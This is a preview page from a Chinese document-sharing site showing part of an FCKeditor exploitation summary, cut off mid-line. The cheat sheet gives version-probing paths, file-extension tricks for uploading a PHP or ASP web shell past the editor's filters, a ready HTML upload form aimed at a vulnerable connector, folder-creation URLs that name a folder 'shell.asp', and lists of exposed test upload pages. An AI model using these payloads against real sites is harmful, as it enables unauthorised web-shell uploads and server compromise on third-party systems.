Fckeditor漏洞利用总结.doc

Fckeditor漏洞利用总结.doc

ID:12853340

大小:14.74 KB

页数:4页

时间:2018-07-19

Fckeditor漏洞利用总结.doc_第1页
Fckeditor漏洞利用总结.doc_第2页
Fckeditor漏洞利用总结.doc_第3页
Fckeditor漏洞利用总结.doc_第4页
资源描述:

《Fckeditor漏洞利用总结.doc》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库

1、Fckeditor漏洞利用总结 Fckeditor漏洞利用总结 查看编辑器版本 Fckeditor/_whatsnew.html ————————————————————————————————————————————————————————————— 2.Version2.2版本 Apache+linux环境下在上传文件后面加个.突破!测试通过。 ————————————————————————————————————————————————————————————— 3.Version<=2.

2、4.2Forphp在处理PHP上传的地方并未对media类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。 <formid=“frmUpload”enctype=“multipart/form-data” action=“http://www.site.com/Fckeditor/editor/filemanager/upload/php/upload.php?Type=media”method=“post”>Uploadanewfile:&l

3、t;br> <inputtype=“file”name=“NewFile”size=“50”><br> <inputid=“btnUpload”type=“submit”value=“Upload”> </form> ————————————————————————————————————————————————————————————— 4.Fckeditor文件上传“.”变“_”下划线的绕过方法 很多时候上传的文件例如:shell.php.ra

4、r或shell.php;.jpg会变为shell_php;.jpg这是新版Fck的变化。 4.1:提交shell.php+空格绕过 不过空格只支持win系统*nix是不支持的[shell.php和shell.php+空格是2个不同的文件未测试。 4.2:继续上传同名文件可变为shell.php;.jpg也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。 ————————————————————————————————————————————————————————————— 5

5、.突破建立文件夹 Fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createFolder&Type=Image&currentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 Fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?com

6、mand=createFolder&currentFolder=/&Type=Image&NewFolderName=shell.asp ————————————————————————————————————————————————————————————— 6.Fckeditor中test文件的上传地址 Fckeditor/editor/filemanager/browser/default/connectors/test.html Fckeditor/editor/file

7、manager/upload/test.html Fckeditor/editor/filemanager/connectors/test.html Fckeditor/editor/filemanager/connectors/uploadtest.html ————————————————————————————————————————————————————————————— 7.常用上传地址 Fckeditor/editor/filemanager/browser/default/connect

8、ors/asp/connector.asp?command=GetFoldersAndFiles&Type=Image&currentFolder=/ Fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp Fckeditor/editor/filemanag

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。